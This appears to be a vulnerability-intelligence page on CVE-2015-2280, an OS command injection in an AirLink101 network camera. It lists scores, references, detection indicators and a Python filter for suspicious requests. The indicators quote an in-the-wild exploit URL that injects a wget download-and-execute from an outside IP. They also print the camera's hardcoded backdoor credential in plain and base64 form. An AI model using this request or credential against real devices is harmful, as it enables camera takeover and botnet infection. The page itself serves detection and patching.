CVE-2015-2280
Published 2017-07-25
CVE-2015-2280: snwrite.cgi in AirLink101 SkyIPCam1620W Wireless N MPEG4 3GPP network camera with firmware FW_AIC1620W_1.1.0-12_20120709_r1192.pck allows remote authenticated…
Priority: P1 · 80 · high · 8.8 (CVSS 3.0)
Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Tags: ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 16.99% (96.7th percentile)
snwrite.cgi in AirLink101 SkyIPCam1620W Wireless N MPEG4 3GPP network camera with firmware FW_AIC1620W_1.1.0-12_20120709_r1192.pck allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in the mac parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| airlink101 | skyipcam1620w_wireless_n_mpeg4_3gpp_firmware | — | — |
Detection & IOCs (extracted from sources)
- url: /maker/snwrite.cgi?mac=1234;wget%20 http:// 89.46.223.70/airlink[.]sh %20-O%20/tmp/666trapgod;chmod%20777%20/tmp/666trapgod;./tmp/666trapgod
- RIFT botnet ELF payloads are packed with UPX packer. Use UPX signature detection on binaries dropped to /tmp/.
- The backdoor credential 'productmaker:ftvsbannedcode' (base64: cHJvZHVjdG1ha2VyOmZ0dnNiYW5uZWRjb2Rl) grants access to /maker/snwrite.cgi. Alert on HTTP Basic Auth using this credential or the encoded string.
- The vulnerable firmware version is FW_AIC1620W_1.1.0-12_20120709_r1192.pck. Inventory devices running this firmware version for prioritized patching and monitoring.
- Exploitation of CVE-2015-2280 requires valid credentials; however, hardcoded backdoor credentials ('productmaker:ftvsbannedcode') present in /server/usr.ini effectively make this unauthenticated in practice.
- Other devices based on the same firmware as the AirLink101 SkyIPCam1620W are likely affected but were not tested by the researcher.
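The two request-level checks listed above (Basic Auth with the backdoor credential, and a `mac` value carrying anything other than a MAC address) can be combined in one log or proxy filter. This is an added example, not code from any of the cited sources; the function names, the MAC allowlist pattern and the sample requests are assumptions constructed for illustration.

```python
import base64
import re
from urllib.parse import urlsplit, unquote_plus

BACKDOOR_CRED = "productmaker:ftvsbannedcode"  # credential quoted on this page
TARGET_PATH = "/maker/snwrite.cgi"             # CGI path quoted on this page
# Assumption: a legitimate mac value holds only hex digits and ':' or '-'.
SAFE_MAC = re.compile(r"[0-9A-Fa-f:\-]{1,17}")

def basic_auth_user_pass(header):
    """Decode an Authorization header; return 'user:pass' or None."""
    if not header:
        return None
    scheme, _, token = header.strip().partition(" ")
    if scheme.lower() != "basic":
        return None
    try:
        raw = base64.b64decode(token.strip(), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    return raw.decode("utf-8", "replace")

def inspect_request(target, authorization=None):
    """Return a sorted list of findings for one request target + auth header."""
    findings = set()
    if basic_auth_user_pass(authorization) == BACKDOOR_CRED:
        findings.add("backdoor-credential")
    parts = urlsplit(target)
    if parts.path.lower() == TARGET_PATH:
        # Split on '&' only, so ';' and other metacharacters stay in the value.
        for pair in parts.query.split("&"):
            name, _, raw = pair.partition("=")
            value = unquote_plus(raw)  # also catches %3B, %7C, %60 ...
            if unquote_plus(name) == "mac" and not SAFE_MAC.fullmatch(value):
                findings.add("mac-not-a-mac-address")
    return sorted(findings)

# Constructed sample requests: (request target, Authorization header)
SAMPLES = [
    ("/maker/snwrite.cgi?mac=00:11:22:AA:BB:CC", "Basic YWRtaW46YWRtaW4="),
    ("/maker/snwrite.cgi?mac=1234;echo%20test",
     "Basic " + base64.b64encode(BACKDOOR_CRED.encode()).decode()),
    ("/maker/snwrite.cgi?mac=1234%3Becho", None),
]

if __name__ == "__main__":
    for target, auth in SAMPLES:
        print(inspect_request(target, auth), target)
```

Matching on an allowlist for `mac` rather than a list of metacharacters means percent-encoded and less common separators are flagged without enumerating them.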
CVSS provenance
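| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 8.8 | HIGH | CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 9.0 | CRITICAL | AV:N/AC:L/Au:S/C:C/I:C/A:C |
| vulncheck | — | 8.8 | HIGH | — |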
GHSA
GHSA-9xpp-pm7c-3qwm: snwrite
ghsa_unreviewed·2022-05-14
CVE-2015-2280 [HIGH] CWE-78 GHSA-9xpp-pm7c-3qwm: snwrite
VulnCheck
airlink101 skyipcam1620w_wireless_n_mpeg4_3gpp_firmware Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2015·CVSS 8.8
CVE-2015-2280 [HIGH] airlink101 skyipcam1620w_wireless_n_mpeg4_3gpp_firmware Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Affected: airlink101 skyipcam1620w_wireless_n_mpeg4_3gpp_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://app.crowdsec.net/cti/cve-explorer/CVE-2015-2280; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2025-10-19&host_type=s
No detection rules found.
Zscaler
A Sneak Peek into Recent IoT Attacks | Zscaler Blog
blogs_zscaler·2019-01-28
Greynoiseio
NoiseLetter June 2025
blogs_greynoiseio
References
- http://packetstormsecurity.com/files/132609/AirLink101-SkyIPCam1620W-OS-Command-Injection.html
- http://seclists.org/fulldisclosure/2015/Jul/40
- http://www.securityfocus.com/archive/1/535963/100/0/threaded
- http://www.securityfocus.com/bid/75597
- https://www.coresecurity.com/advisories/airlink101-skyipcam1620w-os-command-injection
- https://www.exploit-db.com/exploits/37527/